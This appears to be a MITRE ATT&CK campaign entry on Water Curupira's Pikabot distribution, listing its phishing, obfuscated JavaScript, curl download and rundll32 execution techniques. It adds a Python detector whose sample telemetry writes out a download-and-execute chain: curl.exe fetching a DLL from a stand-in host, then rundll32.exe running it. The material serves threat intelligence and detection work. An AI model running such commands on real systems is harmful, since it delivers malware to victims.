Water Curupira Pikabot Distribution, Campaign C0037

| Domain | ID | Name | Use |
|---|---|---|---|
| Enterprise | T1059.003 | Command and Scripting Interpreter: Windows Command Shell | Water Curupira Pikabot Distribution installation via JavaScript will launch follow-on commands via cmd.exe.[1] |
| Enterprise | T1059.007 | Command and Scripting Interpreter: JavaScript | Water Curupira Pikabot Distribution initial delivery included obfuscated JavaScript objects stored in password-protected ZIP archives.[1] |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | Water Curupira Pikabot Distribution used highly obfuscated JavaScript files as one initial installer for Pikabot.[1] |
| Enterprise | T1589.002 | Gather Victim Identity Information: Email Addresses | Water Curupira Pikabot Distribution uses thread spoofing of existing email threads to carry out spearphishing operations.[1] |
| Enterprise | T1105 | Ingress Tool Transfer | Water Curupira Pikabot Distribution used Curl.exe to download the Pikabot payload from an external server, saving the file to the victim machine's temporary directory.[1] |
| Enterprise | T1566.001 | Phishing: Spearphishing Attachment | Water Curupira Pikabot Distribution attached password-protected ZIP archives to deliver Pikabot installers.[1] |
| Enterprise | T1218.011 | System Binary Proxy Execution: Rundll32 | Water Curupira Pikabot Distribution uses rundll32.exe to execute the final Pikabot payload, calling the named export Crash or Limit depending on the variant.[1] |
| Enterprise | T1204 | User Execution | Water Curupira Pikabot Distribution requires users to interact with malicious attachments to start Pikabot installation.[1] |
| Enterprise | T1204.001 | User Execution: Malicious Link | Water Curupira Pikabot Distribution distributed a PDF attachment containing a malicious link to a Pikabot installer.[1] |
| Enterprise | T1204.002 | User Execution: Malicious File | Water Curupira Pikabot Distribution delivered Pikabot installers as password-protected ZIP files containing heavily obfuscated JavaScript, or IMG files containing an LNK mimicking a Word document and a malicious DLL.[1] |
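As an added detection example (not part of the ATT&CK entry or the cited report), the following Python correlates the chain the table describes: curl.exe writing into the user's temp directory (T1105), followed by rundll32.exe running a DLL from that directory with the export Crash or Limit (T1218.011). The process-creation events and their field names are constructed for the example and do not follow any real EDR schema.

```python
import re

# Matches the per-user temp directory in a Windows path (case-insensitive).
TEMP_DIR = re.compile(r"\\appdata\\local\\temp\\", re.IGNORECASE)
# Named exports the campaign is reported to call via rundll32.exe.
PIKABOT_EXPORTS = {"crash", "limit"}

# Constructed sample telemetry: process-creation events ordered by time.
EVENTS = [
    {"ts": 1, "pid": 100, "ppid": 50, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\u\Downloads\invoice.js"'},
    {"ts": 2, "pid": 101, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c curl.exe -o C:\Users\u\AppData\Local\Temp\x.dll http://example.invalid/p"},
    {"ts": 3, "pid": 102, "ppid": 101, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -o C:\Users\u\AppData\Local\Temp\x.dll http://example.invalid/p"},
    {"ts": 4, "pid": 103, "ppid": 101, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\u\AppData\Local\Temp\x.dll,Crash"},
    # Benign control: a system DLL with an ordinary export and no temp path.
    {"ts": 5, "pid": 200, "ppid": 60, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL"},
]


def rundll32_export(cmdline):
    """Return the export name from 'rundll32.exe <dll>,<export>', or None."""
    m = re.search(r"\.dll\s*,\s*([A-Za-z_][\w#]*)", cmdline)
    return m.group(1) if m else None


def detect(events):
    """Return (pid, reason) findings for the curl-to-temp / rundll32 chain."""
    findings = []
    download_parents = set()  # parents of curl.exe processes that wrote to %TEMP%
    for e in events:
        img, cmd = e["image"].lower(), e["cmdline"]
        if img.endswith("\\curl.exe") and TEMP_DIR.search(cmd):
            download_parents.add(e["ppid"])
            findings.append((e["pid"], "curl.exe download into user temp dir (T1105)"))
        elif img.endswith("\\rundll32.exe"):
            export = rundll32_export(cmd)
            if TEMP_DIR.search(cmd) and export and export.lower() in PIKABOT_EXPORTS:
                reason = f"rundll32.exe export {export} on DLL in temp dir (T1218.011)"
                if e["ppid"] in download_parents:
                    reason += "; same parent as the curl.exe download"
                findings.append((e["pid"], reason))
    return findings
```

Running detect(EVENTS) flags pids 102 and 103 and leaves the shell32.dll control event alone; the correlation on a shared parent is what separates this chain from an isolated rundll32.exe call.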